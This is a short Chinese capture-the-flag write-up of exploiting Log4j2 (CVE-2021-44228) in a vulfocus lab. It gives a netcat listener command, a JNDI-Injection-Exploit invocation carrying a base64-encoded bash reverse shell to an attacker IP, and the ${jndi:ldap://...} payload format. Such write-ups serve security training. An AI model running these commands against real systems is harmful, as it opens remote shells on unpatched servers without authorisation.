vulfocus靶场—Log4j2远程命令执行(CVE-2021-44228)
打开靶场,出现页面,点击???,观察url,发现端倪
很明显这里是在payload后面输入利用代码
直接祭出神器:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
首先你要登录你的公网服务器,依次执行如下命令
nc -lvvp 3344 #监听本机的3344端口,以便后期的反弹shell接受
#新打开一个ssh连接
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC8zMzQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 攻击IP地址
#-C 表示执行的命令
#-A 表示攻击机器IP地址,就是反连IP
#bash -c 表示读取其后面的字符串作为要执行的命令
#YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC8zMzQ0IDA+JjE= 是bash -i >& /dev/tcp/ip/3344 0>&1的base64编码
#base64,-d 表示base64解码
#bash,-i 表示提供一个交互式的界面
直接在你的公网服务器上执行就完了
然后将输出的粉红色的命令摘取一个,在burp中进行测试
此时查看公网监听的有了回应,成功上线
进入tmp/目录查看flag
成功通关
总结
此靶场主要考察以下几点:
1、log4j rce漏洞 CVE-2021-44228
漏洞的形成主要是lookup()函数动态加载的远程恶意类,DNS、RMI、LDAP都是JNDI的远程加载协议。
2、关键参数,payload,其他环境不一定是此参数。
3、格式,${jndi:ldap://xxxxxx}